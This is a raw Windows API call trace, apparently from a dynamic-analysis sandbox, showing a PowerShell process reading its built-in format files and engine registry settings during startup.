[0079.205] SetErrorMode (uMode=0x1) returned 0x1
[0079.205] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d340 | out: lpFileInformation=0x16d340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0079.215] SetErrorMode (uMode=0x1) returned 0x1
[0079.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.215] SetErrorMode (uMode=0x1) returned 0x1
[0079.215] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d340 | out: lpFileInformation=0x16d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
[0079.215] SetErrorMode (uMode=0x1) returned 0x1
[0079.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
[0079.215] SetErrorMode (uMode=0x1) returned 0x1
[0079.215] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d340 | out: lpFileInformation=0x16d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
[0079.215] SetErrorMode (uMode=0x1) returned 0x1
[0079.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.215] SetErrorMode (uMode=0x1) returned 0x1
[0079.215] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d340 | out: lpFileInformation=0x16d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
[0079.215] SetErrorMode (uMode=0x1) returned 0x1
[0079.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.216] SetErrorMode (uMode=0x1) returned 0x1
[0079.216] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d340 | out: lpFileInformation=0x16d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
[0079.216] SetErrorMode (uMode=0x1) returned 0x1
[0079.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
[0079.216] SetErrorMode (uMode=0x1) returned 0x1
[0079.216] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d340 | out: lpFileInformation=0x16d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
[0079.216] SetErrorMode (uMode=0x1) returned 0x1
[0079.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
[0079.216] SetErrorMode (uMode=0x1) returned 0x1
[0079.216] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d340 | out: lpFileInformation=0x16d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
[0079.216] SetErrorMode (uMode=0x1) returned 0x1
[0079.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
[0079.216] SetErrorMode (uMode=0x1) returned 0x1
[0079.216] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d340 | out: lpFileInformation=0x16d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
[0079.216] SetErrorMode (uMode=0x1) returned 0x1
[0079.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
[0079.217] SetErrorMode (uMode=0x1) returned 0x1
[0079.217] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d340 | out: lpFileInformation=0x16d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
[0079.217] SetErrorMode (uMode=0x1) returned 0x1
[0079.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
[0079.217] SetErrorMode (uMode=0x1) returned 0x1
[0079.217] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d340 | out: lpFileInformation=0x16d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
[0079.217] SetErrorMode (uMode=0x1) returned 0x1
[0079.217] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0079.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0079.217] CoTaskMemFree (pv=0x256670)
[0079.240] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0079.241] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0079.241] CoTaskMemFree (pv=0x256670)
[0079.241] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0079.241] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0079.241] CoTaskMemFree (pv=0x256670)
[0079.241] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0079.241] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0079.241] CoTaskMemFree (pv=0x256670)
[0079.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.241] SetErrorMode (uMode=0x1) returned 0x1
[0079.241] SetErrorMode (uMode=0x1) returned 0x1
[0079.242] GetFileType (hFile=0x30c) returned 0x1
[0079.242] ReadFile (in: hFile=0x30c, lpBuffer=0x340c570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x340c570*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.254] ReadFile (in: hFile=0x30c, lpBuffer=0x340c570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x340c570*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.256] ReadFile (in: hFile=0x30c, lpBuffer=0x340c570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x340c570*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.256] ReadFile (in: hFile=0x30c, lpBuffer=0x340c570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x340c570*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.257] ReadFile (in: hFile=0x30c, lpBuffer=0x340c570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x340c570*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.257] ReadFile (in: hFile=0x30c, lpBuffer=0x340c570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x340c570*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.257] ReadFile (in: hFile=0x30c, lpBuffer=0x340c570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x340c570*, lpNumberOfBytesRead=0x16cfd8*=0x9e2, lpOverlapped=0x0) returned 1
[0079.257] ReadFile (in: hFile=0x30c, lpBuffer=0x340baba, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x340baba*, lpNumberOfBytesRead=0x16cfd8*=0x0, lpOverlapped=0x0) returned 1
[0079.257] ReadFile (in: hFile=0x30c, lpBuffer=0x340c570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x340c570*, lpNumberOfBytesRead=0x16cfd8*=0x0, lpOverlapped=0x0) returned 1
[0079.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.257] SetErrorMode (uMode=0x1) returned 0x1
[0079.257] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cf80 | out: lpFileInformation=0x16cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
[0079.257] SetErrorMode (uMode=0x1) returned 0x1
[0079.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.257] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d068 | out: phkResult=0x16d068*=0x30c) returned 0x0
[0079.257] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cfec, lpData=0x0, lpcbData=0x16cfe8*=0x0 | out: lpType=0x16cfec*=0x1, lpData=0x0, lpcbData=0x16cfe8*=0x56) returned 0x0
[0079.258] CoTaskMemAlloc (cb=0x5a) returned 0x2f8eb0
[0079.258] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cfbc, lpData=0x2f8eb0, lpcbData=0x16cfb8*=0x56 | out: lpType=0x16cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16cfb8*=0x56) returned 0x0
[0079.258] CoTaskMemFree (pv=0x2f8eb0)
[0079.258] RegCloseKey (hKey=0x30c) returned 0x0
[0079.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.341] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xa6cf7dbf, Data2=0xb31d, Data3=0x404c, Data4=([0]=0x9e, [1]=0xd9, [2]=0xae, [3]=0xa0, [4]=0x6, [5]=0xbc, [6]=0xc3, [7]=0x44))) returned 0x0
[0079.364] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x8751c25, Data2=0xbd32, Data3=0x4246, Data4=([0]=0xb2, [1]=0x23, [2]=0xc, [3]=0x7a, [4]=0xbc, [5]=0x62, [6]=0x58, [7]=0x57))) returned 0x0
[0079.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
[0079.366] SetErrorMode (uMode=0x1) returned 0x1
[0079.366] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
[0079.366] GetFileType (hFile=0x30c) returned 0x1
[0079.366] SetErrorMode (uMode=0x1) returned 0x1
[0079.366] GetFileType (hFile=0x30c) returned 0x1
[0079.366] ReadFile (in: hFile=0x30c, lpBuffer=0x34370d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x34370d8*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.368] ReadFile (in: hFile=0x30c, lpBuffer=0x34370d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x34370d8*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.368] ReadFile (in: hFile=0x30c, lpBuffer=0x34370d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x34370d8*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.368] ReadFile (in: hFile=0x30c, lpBuffer=0x34370d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x34370d8*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.368] ReadFile (in: hFile=0x30c, lpBuffer=0x34370d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x34370d8*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.369] ReadFile (in: hFile=0x30c, lpBuffer=0x34370d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x34370d8*, lpNumberOfBytesRead=0x16cfd8*=0xfb2, lpOverlapped=0x0) returned 1
[0079.369] ReadFile (in: hFile=0x30c, lpBuffer=0x34367f2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x34367f2*, lpNumberOfBytesRead=0x16cfd8*=0x0, lpOverlapped=0x0) returned 1
[0079.369] ReadFile (in: hFile=0x30c, lpBuffer=0x34370d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x34370d8*, lpNumberOfBytesRead=0x16cfd8*=0x0, lpOverlapped=0x0) returned 1
[0079.369] CloseHandle (hObject=0x30c) returned 1
[0079.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
[0079.369] SetErrorMode (uMode=0x1) returned 0x1
[0079.369] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cf80 | out: lpFileInformation=0x16cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
[0079.370] SetErrorMode (uMode=0x1) returned 0x1
[0079.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
[0079.370] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d068 | out: phkResult=0x16d068*=0x30c) returned 0x0
[0079.370] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cfec, lpData=0x0, lpcbData=0x16cfe8*=0x0 | out: lpType=0x16cfec*=0x1, lpData=0x0, lpcbData=0x16cfe8*=0x56) returned 0x0
[0079.370] CoTaskMemAlloc (cb=0x5a) returned 0x2f94d0
[0079.370] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cfbc, lpData=0x2f94d0, lpcbData=0x16cfb8*=0x56 | out: lpType=0x16cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16cfb8*=0x56) returned 0x0
[0079.370] CoTaskMemFree (pv=0x2f94d0)
[0079.370] RegCloseKey (hKey=0x30c) returned 0x0
[0079.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
[0079.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
[0079.371] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xa0b80b58, Data2=0x9b2d, Data3=0x46a5, Data4=([0]=0x92, [1]=0xe2, [2]=0x22, [3]=0xa6, [4]=0x16, [5]=0xb4, [6]=0xa3, [7]=0xf0))) returned 0x0
[0079.372] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x7fc0387b, Data2=0xadc3, Data3=0x4951, Data4=([0]=0x91, [1]=0x5d, [2]=0x7e, [3]=0x71, [4]=0x6f, [5]=0x72, [6]=0x7a, [7]=0x55))) returned 0x0
[0079.414] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x841d51fb, Data2=0xb2b0, Data3=0x4fb0, Data4=([0]=0xac, [1]=0x41, [2]=0xf, [3]=0x7, [4]=0xbd, [5]=0x76, [6]=0x51, [7]=0x9))) returned 0x0
[0079.414] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x37c3f886, Data2=0x5932, Data3=0x4054, Data4=([0]=0xab, [1]=0xe4, [2]=0xa7, [3]=0xb9, [4]=0x71, [5]=0x2a, [6]=0xed, [7]=0xf3))) returned 0x0
[0079.414] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x2f0bcd8d, Data2=0xe789, Data3=0x4f0c, Data4=([0]=0x97, [1]=0x70, [2]=0xa9, [3]=0x1e, [4]=0x7e, [5]=0xf9, [6]=0xf8, [7]=0x48))) returned 0x0
[0079.414] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x80f91ce7, Data2=0xac4b, Data3=0x4e1c, Data4=([0]=0x81, [1]=0xc4, [2]=0xf2, [3]=0xd3, [4]=0x6e, [5]=0x67, [6]=0xc7, [7]=0x77))) returned 0x0
[0079.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.415] SetErrorMode (uMode=0x1) returned 0x1
[0079.415] SetErrorMode (uMode=0x1) returned 0x1
[0079.415] GetFileType (hFile=0x30c) returned 0x1
[0079.415] ReadFile (in: hFile=0x30c, lpBuffer=0x3482e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3482e38*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.429] ReadFile (in: hFile=0x30c, lpBuffer=0x3482e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3482e38*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
[0079.430] ReadFile (in: hFile=0x30c, lpBuffer=0x3482e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3482e38*, lpNumberOfBytesRead=0x16cfd8*=0x1000, lpOverlapped=0x0) returned 1
